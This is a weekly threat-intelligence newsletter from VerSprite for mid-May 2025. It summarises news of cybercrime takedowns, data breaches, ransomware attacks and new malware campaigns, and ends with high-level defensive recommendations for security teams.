HomeSecurity ResourcesThreat BriefingsVerSprite Weekly Threat Intelligence

VerSprite Weekly Threat Intelligence

Date Range: 12 May 2025 – 16 May 2025

Issue: 14th Edition

Security Triumphs of the Week

This week, cybercriminals took heavy hits across the globe! The infamous LockBit ransomware gang was breached, leaking insider secrets and crippling its operations. U.S. authorities dismantled a major botnet and charged Russian operators, while Germany shut down a $1.9B crypto laundering platform, seizing millions and 8TB of data. Telegram cracked down on black market channels, and Europol busted a massive cyber fraud syndicate targeting European banks.

LockBit Ransomware Gang Hacked – Internal Data Leaked
One of the world’s most notorious ransomware gangs, LockBit, has suffered another major breach. Leaked internal data reveals affiliate structures, operational methods, negotiation tactics, and internal communications. The breach not only damages LockBit’s credibility but provides a goldmine of threat intelligence for defenders. This event could significantly hinder their operations moving forward.
Read full article: Analyst1

U.S. Takes Down Botnet, Charges Russian Operators
The U.S. Department of Justice announced the takedown of a major botnet and filed criminal charges against its alleged Russian administrators. This botnet was involved in large-scale credential theft, malware distribution, and cyber fraud. These actions reflect ongoing efforts to hold foreign threat actors accountable and disrupt international cybercrime infrastructure.
Read full article: Securityweek

Germany Shuts Down eXch Crypto Platform – $1.9B Laundering Operation Crushed
German authorities dismantled the eXch cryptocurrency platform that was allegedly used to launder over $1.9 billion. Along with the seizure of €34 million in crypto, investigators also confiscated 8TB of critical data. This takedown severely impacts dark web finance operations and reveals valuable insights into cybercrime funding structures.
Read full article: Thehackernews

Telegram Blocks Two Massive Black-Market Channels
Telegram has taken decisive action by blocking two major black-market services operating on its platform. These services, which facilitated illegal sales of data and tools, were warned and forced to shut down. This rare enforcement move shows Telegram responding to growing pressure to curb cybercrime on its app.
Read full article: Reuters

Europol Busts Major Cyber Fraud Syndicate
Europol led a coordinated crackdown on a large-scale cyber fraud ring that targeted banks and individuals across Europe. The operation resulted in multiple arrests, asset seizures, and the dismantling of critical infrastructure. This marks another significant win in the fight against financial cybercrime and organized fraud.
Read full article: Scworld

Security Setbacks of the Week

This week saw a diverse set of significant cybersecurity breaches impacting government infrastructure, healthcare providers, major tech vendors, and even international airlines. Third-party risk, supply chain weaknesses, and the increasing intersection of geopolitics with healthcare were evident across incidents. Ransomware operations continued to disrupt critical services, while exploitation of trusted communication platforms raised red flags about abuse potential in digital government services.

U.S. Government Alert System Hijacked to Distribute Scam Links
The GovDelivery platform, used by over 1,000 government agencies, was exploited to send credential-stealing phishing emails that appeared legitimate due to the system’s trusted .gov domain. Attackers leveraged an email template testing feature to blast out scam messages, exploiting a misconfiguration or potential design flaw in the system. This raises serious concerns about third-party service security in government infrastructure.
Read full article: TechCrunch

Idaho Hospital Breach Exposes 34,000 Individuals’ Sensitive Data
Idaho-based Mountain View Hospital disclosed a breach affecting over 34,000 people, involving the unauthorized access to full names, Social Security Numbers, and protected health information. The breach, which occurred in late March 2025, highlights the healthcare sector’s ongoing struggle to safeguard personal data against evolving cyber threats.
Read full article: Comparitech

Broadcom Employee Data Compromised via Third-Party Vendor
A third-party breach at benefits administrator Alight Solutions resulted in the theft of sensitive Broadcom employee data. The information exposed includes names, Social Security Numbers, and possibly more. While Broadcom itself wasn’t directly breached, the incident underscores the inherent risks in the supply chain and third-party data management.
Read full article: The Register

South African Airways Hit by ‘INC Ransomware’ Gang
A ransomware group known as INC claimed responsibility for a recent attack on South African Airways. The gang published stolen data samples, suggesting successful exfiltration and encryption operations. The breach affected flight operations and internal systems, adding to the growing list of ransomware incidents targeting the aviation sector globally.
Read full article: Comparitech

Russian Hospital Disrupted by Alleged Western Cyberattack
A hospital in the Russian city of Voronezh was forced to shut down IT operations following a cyberattack allegedly tied to Western threat actors. The attack impacted patient records and medical equipment functionality, significantly disrupting healthcare services. Attribution remains murky, but the geopolitical context suggests increasing cyber hostilities involving healthcare targets.
Read full article: The Record

The New Emerging Threats

From stealthy fileless RATs to state-backed espionage, this week’s cyber landscape is packed with red flags. The Remcos RAT resurfaces using LNK and MSHTA in a fileless PowerShell attack, while TransferLoader enables full command execution on infected systems. A serious supply chain breach dropped the SnipVex and XRed malware into printer software downloads. Meanwhile, Fancy Bear is back, targeting top Ukrainian officials, and ClickFix exploits are being tested against Linux systems.

Fileless Remcos RAT Delivered via LNK and MSHTA
A new attack campaign is leveraging Windows shortcut (LNK) files and MSHTA to deploy a fileless variant of the Remcos RAT. The malware uses PowerShell to establish persistence and remote access without dropping visible files on disk, making it harder to detect. This technique bypasses traditional defenses and highlights the need for advanced behavioral detection.
Read full article: Thehackernews

SnipVex and XRed Malware Found in Procolored Printer Software
Security researchers have uncovered two malware strains — SnipVex and XRed — embedded in official downloads from Procolored, a printer vendor. These malicious tools include a clipbanker and a backdoor, active for over six months on the vendor’s site. This supply chain compromise threatens unsuspecting users who downloaded legitimate-looking printer drivers.
Read full article: Securityonline

Fancy Bear Targets Ukrainian Officials in Espionage Campaign
Russia-linked APT group Fancy Bear (APT28) has been conducting a new campaign aimed at stealing emails from high-ranking Ukrainian officials and defense contractors. This ongoing espionage operation highlights the group’s continued interest in Ukrainian intelligence, especially during heightened geopolitical tensions. The operation likely includes spear-phishing and credential harvesting tactics.
Read full article: Cyberscoop

ClickFix Exploits Under Test Against Linux Systems
Researchers have spotted attackers experimenting with a new exploit technique called ClickFix, initially targeting Windows but now being tested against Linux. The attack abuses UI event handlers in desktop environments to trigger unauthorized actions. While not yet widespread, this cross-platform threat is a red flag for Linux system admins.
Read full article: Bleepingcomputer

TransferLoader Malware Enables Command Execution on Infected Hosts
A newly identified malware called TransferLoader allows attackers to execute arbitrary commands on compromised machines. Delivered through fake software or phishing vectors, it connects C2 servers to exfiltrate data and receive attacker instructions. This malware is modular, adaptable, and poses significant risks to both individuals and organizations.
Read full article: Gbhackers

In-Depth Expert CTI Analysis

This week illustrated the powerful reach of international collaboration against cybercrime, with multiple law enforcement victories. Simultaneously, the threat landscape evolved across ransomware, espionage, and supply chain vulnerabilities. While law enforcement agencies dealt significant blows to cybercriminals, critical sectors including healthcare, aviation, and government services faced major disruptions due to data breaches and operational attacks.

Proactive Defense and Strategic Foresight

Global law enforcement cooperation is paying off. The takedown of LockBit’s infrastructure and large-scale botnets signals that threat actors can be reached even across borders. These developments should inspire organizations to:

Strengthen cooperation with cybercrime units and ISACs.
Review threat models with updated TTPs based on LockBit leaks.
Increase monitoring of C2 domains and leaked affiliate indicators.

Evolving Ransomware and Malware Tactics

Ransomware actors are adapting, but internal exposure is weakening their grip. The LockBit leaks revealed operational details and affiliate networks, giving defenders a unique intelligence opportunity.

INC ransomware’s attack on South African Airways reiterates that aviation and transport sectors remain high-value targets.
Fileless malware like the Remcos RAT using LNK + MSHTA evasion techniques bypass traditional defenses, highlighting the need for behavior-based detection.
Supply chain attacks like SnipVex/XRed in printer drivers show that even non-core applications can be exploited.

State-Sponsored and Organized Cybercrime Convergence

The return of Fancy Bear underscores the persistent threat posed by state-sponsored groups. Cybercriminal and APT behaviors continue to overlap in sophistication and targets.

APT28 targeting Ukrainian officials reflects continued espionage motives amidst geopolitical conflicts.
Alleged Western-sourced attacks on Russian healthcare systems indicate cyberwarfare spilling into civilian infrastructure.
Financial fraud rings disrupted by Europol show traditional crime increasingly adopting cyber tactics.

Operational and Tactical Implications

Organizations should assume compromise not just from direct attacks but from third-party vendors, supply chains, and overlooked assets:

Broadcom’s data exposure via Alight Solutions emphasizes the need to assess third-party security controls.
Misuse of GovDelivery’s trusted email domain highlights the risk of service abuse even when infrastructure seems secure.
Fileless, stealthy infections require updated detection strategies, such as EDR with memory analysis and script behavior tracking.

Forward-Looking Recommendations

Security leaders should prioritize the following:

Leverage leaked LockBit data to hunt for IOCs and refine threat detection models.
Conduct tabletop exercises simulating ransomware impacts on aviation, healthcare, and government systems.
Adopt Zero Trust principles for vendors and digital services, limiting blast radius in case of compromise.
Harden Linux environments such as ClickFix and similar exploits move cross-platform.
Monitor Telegram and similar platforms for dark market activity resurgence.